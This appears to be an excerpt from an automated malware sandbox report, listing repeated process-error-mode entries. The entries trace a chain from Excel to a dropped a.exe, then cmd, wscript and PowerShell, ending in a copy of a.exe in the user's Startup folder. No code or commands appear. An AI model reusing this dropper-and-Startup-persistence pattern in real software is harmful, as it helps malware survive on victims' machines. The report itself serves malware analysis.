Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
